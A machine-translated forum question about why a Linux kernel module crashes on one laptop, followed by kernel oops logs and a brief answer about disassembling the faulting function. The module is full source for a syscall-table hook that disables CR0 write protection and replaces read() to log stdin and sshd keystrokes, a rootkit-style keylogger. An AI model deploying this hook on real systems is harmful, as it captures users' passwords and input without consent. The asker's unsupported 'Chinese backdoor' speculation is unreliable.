LKM 崩溃取决于硬件?
LKM crashs depends on hardware?
我的 LKM 劫持 stdin/sshd 输入:https://pastebin.com/RChpbt9G
# uname -a
Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
我在两台计算机上都使用最新的 kali2019.2。
https://www.kali.org/downloads/
- 第一台电脑 i5-2500K - 好的。
- 第二台电脑 i7-6700HQ(硬件名称:Acer NG-G9-592-52LP/Mustang_SLS,BIOS V1.05 03/01/2016)-
gaming laptop
- 崩溃...
生成文件:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
@rm -f *.o .*.cmd .*.flags *.mod.c *.order
@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
@rm -fR .tmp*
@rm -rf .tmp_versions
LKM代码:
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>
#define PID_MAX 32768
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.2" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );
static DEFINE_SPINLOCK( mLock );
static unsigned long ( *original_read ) ( const struct pt_regs *regs );
void **sct;
static unsigned long flags; // irq flags
static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
static unsigned long long LOCK_NUMBER_ATOM_VAL;
static bool pids[ PID_MAX ];
static inline void rw_enable( void ) {
asm volatile ( "pushq %rax \n"
"movq %cr0, %rax \n"
"andq [=12=]xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
static unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned long r = 1;
unsigned int fd = regs->di;
char *buf = (char*) regs->si;
atomic_inc( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = true;
r = original_read( regs );
if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
if ( strlen( buf ) > 0 )
info( "hacked_read: %c\n", buf[ 0 ] );
}
atomic_dec( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = false;
return r;
}
int hacked_read_init( void ) {
register uint64_t cr0;
int cpu;
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
info( "Module was loaded\n" );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
int cpu;
unsigned int i;
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[__NR_read] = original_read;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
for( i = 0; i < PID_MAX; i++ ) {
if ( pids[ i ] ) {
info( "Locked. pid = %d\n", i );
}
}
msleep( 5000 );
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
}
info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
info( "Module was unloaded\n" );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
当我在 i5-2500K 上使用它时 - 它很好,并且键盘的每个输入都很好地显示在 /var/log/syslog 中。
然而,当我在 i7-6700HQ 上加载这个模块时,它会变得疯狂并阻塞键盘,所以我正在以这种方式对其进行测试:
#!/bin/bash
cp -v /mnt/opt2/usr_src/programming/cpp/hacked_read/hacked_read.ko /lib/modules/4.19.0-kali4-amd64/
depmod
modprobe hacked_read
sleep 10
rmmod hacked_read
我在 /var/log/syslog 中看到了这个:https://pastebin.com/D7YS3z0c
Jun 13 16:00:24 localhost kernel: [ 1624.899161] hacked_read: loading out-of-tree module taints kernel.
Jun 13 16:00:24 localhost kernel: [ 1624.899538] hacked_read: Module was loaded
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Main process exited, code=killed, status=9/KILL
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Failed with result 'signal'.
Jun 13 16:00:24 localhost kernel: [ 1624.906589] BUG: unable to handle kernel paging request at 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906592] PGD 80000002dcbe3067 P4D 80000002dcbe3067 PUD 2e3bab067 PMD 2df01c067 PTE 8000000450ae7867
Jun 13 16:00:24 localhost kernel: [ 1624.906597] Oops: 0001 [#1] SMP PTI
Jun 13 16:00:24 localhost kernel: [ 1624.906599] CPU: 4 PID: 15874 Comm: atopacctd Tainted: G O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:24 localhost kernel: [ 1624.906601] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:24 localhost kernel: [ 1624.906604] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906605] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906607] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906609] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906610] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906611] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906612] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906613] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906615] FS: 00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906617] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906618] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906619] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906621] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:24 localhost kernel: [ 1624.906622] Call Trace:
Jun 13 16:00:24 localhost kernel: [ 1624.906627] do_syscall_64+0x53/0x100
Jun 13 16:00:24 localhost kernel: [ 1624.906630] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:24 localhost kernel: [ 1624.906632] RIP: 0033:0x7f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906634] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:24 localhost kernel: [ 1624.906635] RSP: 002b:00007fffc3497528 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906637] RAX: ffffffffffffffda RBX: 0000000000000009 RCX: 00007f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906638] RDX: 0000000000003e80 RSI: 00007fffc3497560 RDI: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906639] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906641] R10: 0000000000000040 R11: 0000000000000246 R12: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906642] R13: 00007fffc3497550 R14: 00007fffc349b6c0 R15: 00007fffc349b478
Jun 13 16:00:24 localhost kernel: [ 1624.906643] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:24 localhost kernel: [ 1624.906676] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:24 localhost kernel: [ 1624.906712] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:24 localhost kernel: [ 1624.906718] CR2: 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906719] ---[ end trace a09f35b7d83f68d8 ]---
Jun 13 16:00:24 localhost kernel: [ 1624.906722] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906723] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906725] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906726] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906727] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906728] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906730] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906732] FS: 00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906734] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906735] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906736] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906737] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433687] BUG: unable to handle kernel paging request at 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433695] PGD 80000002e39d0067 P4D 80000002e39d0067 PUD 2e332d067 PMD 2d13bc067 PTE 80000002b4f9a867
Jun 13 16:00:25 localhost kernel: [ 1625.433708] Oops: 0001 [#2] SMP PTI
Jun 13 16:00:25 localhost kernel: [ 1625.433716] CPU: 3 PID: 21500 Comm: grep Tainted: G D O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:25 localhost kernel: [ 1625.433719] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:25 localhost kernel: [ 1625.433729] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.433734] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.433738] RSP: 0018:ffff9f1dc5f4ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.433744] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433747] RDX: 0000000000000000 RSI: ffff8eb7ef52c020 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.433751] RBP: 0000556becd76d67 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433755] R10: ffff9f1dc5f4feb0 R11: 0000000000000001 R12: 00000000000000d8
Jun 13 16:00:25 localhost kernel: [ 1625.433758] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433763] FS: 00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433767] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.433771] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.433775] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433779] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433782] Call Trace:
Jun 13 16:00:25 localhost kernel: [ 1625.433795] do_syscall_64+0x53/0x100
Jun 13 16:00:25 localhost kernel: [ 1625.433804] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:25 localhost kernel: [ 1625.433810] RIP: 0033:0x7f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433815] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:25 localhost kernel: [ 1625.433819] RSP: 002b:00007ffd300aaaa8 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433824] RAX: ffffffffffffffda RBX: 000000000000e000 RCX: 00007f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433828] RDX: 000000000000e000 RSI: 0000556becd76d67 RDI: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433832] RBP: 000000000000e000 R08: 000000000000000f R09: 0000000000019008
Jun 13 16:00:25 localhost kernel: [ 1625.433835] R10: 0000000000000004 R11: 0000000000000246 R12: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433839] R13: 0000000000000000 R14: 0000556becd6c800 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433843] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:25 localhost kernel: [ 1625.433931] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:25 localhost kernel: [ 1625.434030] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:25 localhost kernel: [ 1625.434046] CR2: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.434051] ---[ end trace a09f35b7d83f68d9 ]---
Jun 13 16:00:25 localhost kernel: [ 1625.434058] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.434063] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.434066] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.434071] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434074] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.434078] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434081] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:25 localhost kernel: [ 1625.434085] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434090] FS: 00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434093] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.434097] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.434101] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434105] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419417] BUG: unable to handle kernel paging request at 00007ffd57fa5d6f
Jun 13 16:00:35 localhost kernel: [ 1635.419427] PGD 80000002dc983067 P4D 80000002dc983067 PUD 2d80bd067 PMD 2f3d2d067 PTE 80000003254c4867
Jun 13 16:00:35 localhost kernel: [ 1635.419442] Oops: 0001 [#3] SMP PTI
Jun 13 16:00:35 localhost kernel: [ 1635.419450] CPU: 4 PID: 21549 Comm: atop Tainted: G D O 4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:35 localhost kernel: [ 1635.419454] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:35 localhost kernel: [ 1635.419464] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:35 localhost kernel: [ 1635.419470] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:35 localhost kernel: [ 1635.419475] RSP: 0018:ffff9f1dc6437f20 EFLAGS: 00010246
Jun 13 16:00:35 localhost kernel: [ 1635.419481] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419485] RDX: 0000000000000000 RSI: 0000000000000257 RDI: ffff8eb632d9fc28
Jun 13 16:00:35 localhost kernel: [ 1635.419489] RBP: 00007ffd57fa5d6f R08: 0000714c40000000 R09: 0000000000025d19
Jun 13 16:00:35 localhost kernel: [ 1635.419494] R10: 0000000000026611 R11: 0000017cc5933f1e R12: fffffffffffffe00
Jun 13 16:00:35 localhost kernel: [ 1635.419497] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419503] FS: 00007fa66b6b9d40(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419508] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:35 localhost kernel: [ 1635.419512] CR2: 00007ffd57fa5d6f CR3: 00000002e31fe005 CR4: 00000000003606e0
Jun 13 16:00:35 localhost kernel: [ 1635.419517] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419521] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419524] Call Trace:
Jun 13 16:00:35 localhost kernel: [ 1635.419538] do_syscall_64+0x53/0x100
Jun 13 16:00:35 localhost kernel: [ 1635.419548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:35 localhost kernel: [ 1635.419555] RIP: 0033:0x7fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419560] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:35 localhost kernel: [ 1635.419565] RSP: 002b:00007ffd57fa5d38 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419571] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419575] RDX: 0000000000000001 RSI: 00007ffd57fa5d6f RDI: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419579] RBP: 000056148ad79380 R08: 0000000000000000 R09: 000000000000ffff
Jun 13 16:00:35 localhost kernel: [ 1635.419583] R10: 0000000000000008 R11: 0000000000000246 R12: 00000000000003e8
Jun 13 16:00:35 localhost kernel: [ 1635.419587] R13: 000056148ad93380 R14: 000056148ad3bd20 R15: 00005614890723a6
Jun 13 16:00:35 localhost kernel: [ 1635.419592] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:35 localhost kernel: [ 1635.419690] crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:35 localhost kernel: [ 1635.419800] intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:35 localhost kernel: [ 1635.419817] CR2: 00007ffd57fa5d6f
如果你读过我之前的两个问题,都是关于这个 LKM 的,还有另外两个问题,我都在这个 ^ new code
中解决了。
第一个是模块卸载错误,因此几个进程不断调用 hacked_read_test
函数并因错误 can not access to this part of memory
而崩溃,因为模块已经卸载。第二个是关于所有 sys_calls 的新包装器,换句话说:"kernel code evolution/mutation",因此出现了一种通过 regs
的新方法。我已经解决了这个问题,所以我的新代码至少可以在部分机器上运行,可能带有“"old"”中央处理器。
我的问题是:为什么它在 i7-6700HQ 上崩溃?它可以是什么?
在不接受我的 asm
操作的裸硬件上带有 "XEN-like" 虚拟机的中国后门?或者什么?
查看日志文件可以看到:
BUG: unable to handle kernel paging request at 00007fffc3497560
此外,指令指针位于:
RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
最好的做法是反汇编函数并找到有问题的指令。
另外代码需要改进:
- 您需要检查 return 个值
